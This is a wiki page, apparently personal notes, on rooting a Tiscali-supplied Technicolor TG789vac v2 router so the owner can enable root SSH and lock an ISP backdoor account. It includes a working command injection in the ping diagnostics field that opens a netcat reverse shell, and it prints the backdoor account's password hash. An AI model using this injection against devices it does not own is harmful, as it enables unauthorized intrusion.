User Tools

Site Tools


doc:appunti:hardware:technicolor_tg789vac_v2

This is an old revision of the document!


Rooting the router Technicolor TG789vac v2

This router DSL/FTTH Home router is running OpenWRT, it can bee rooted with few simple commands.

I tested the following procedure on a model shipped by Tiscali, an Italian Service Provider.

Product Vendor Technicolor
Product Name MediaAccess TG789vac v2
Software Version 16.3
Firmware Version 16.3.7636-2921002-20170419153951
Bootloader Version 2.0.85
Hardware Version VANT-6

The router default IP address is 192.168.1.1 (beware that it has a DHCP server enabled), web access is with admin login and admin password.

You need a PC connected on the same LAN (I used a GNU/Linux box), issue the following command on the PC:

nc -lvvp 1025

this will bind the TCP port 1025 and start listening for an incoming connection.

On the router you have to navigate the Dignostic tile, then the Ping & Traceroute tab. Inside the IP Address text input, write the following command just before clicking the Send Ping Request button:

:::::::;nc 192.168.1.46 1025 -e /bin/sh

the IP address must be the one of your PC. On the PC you will get a root shell. Use the passwd command to change the root password:

passwd
Changing password for root
New password: MySecret
Retype password: MySecret
Password for root changed by root

Finally you have to permaently enable the ssh access for the root user (but only from the LAN interface), copy and paste the following commands exactly:

sed -i.save 's#root:/bin/false#root:/bin/ash#' /etc/passwd
sed -i.save 's/0/1/' /etc/config/dropbear
sed -i 's/off/on/' /etc/config/dropbear
sed -i "s/wan/lan/" /etc/config/dropbear
/etc/init.d/dropbear restart

OpenWRT

The installed OpenWRT will fetch packages from this URL:

http://downloads.openwrt.org/chaos_calmer/15.05.1/brcm63xx-tch/VANTF/packages/Packages.gz

which indeed brigs the Not Found error.

The Tiscali Backdoor

Once you got ssh access to the rotuer, you can confirm that there is a Tiscali backdoor, just look at the /etc/passwd file:

tiscali:x:550:550:tiscali:/home/tiscali:/usr/bin/restricted-clash

and at the /etc/shadow one:

tiscali:$1$CEK1lG1Q$bcHMHT6KEzDvKJ8ODFyCB0:17275:0:99999:7:::

The password is unknown, but it is an high security risk to have that account enabled on the Wan side (as it was the Dropbear SSH server, per default). Tiscaly surely knows that password, may be also some bad guy alread had cracked it, but you are not able to change or disable it.

This is enough to justify your right to have root privileges, and use them to lock-down the tiscali backdoor:

passwd -l tiscali

Router Bircked

I succeeded in bricking this router, may be after I installed the openvpn package, which required the kmod-tun one. I mixed packages from different architectures and sources, so probably I got some unworkable mix. It is probable that my customization went into the overlay partition and the boot partition is still good, but unfortunately I don't know any method to hard-reset the overlay.

There are two reset methods possibile:

  • Power-off, keep the reset switch pressed, power-on. This method can be used to start the bootp procedure, which indeed can load and flash the stock firmware from a TFTP server. I done that, but the overlay partition is still messed and the router does not revive.
  • Once the router is powered-on, press the reset switch for 7 seconds or more. The router should erase custom data and restart. Unfortunately this does not work for me, may be because the router is so messed-up, that the reset procedure does not even start.

I tried also to connect a serial adapter to the J5 tag, soldering three wires to it. TX and RX lines should correspond to R327 and R328 resistors, according to some posts. But I did not get any serial signal.

Credits and Web References

doc/appunti/hardware/technicolor_tg789vac_v2.1584032626.txt.gz · Last modified: 2020/03/12 18:03 by niccolo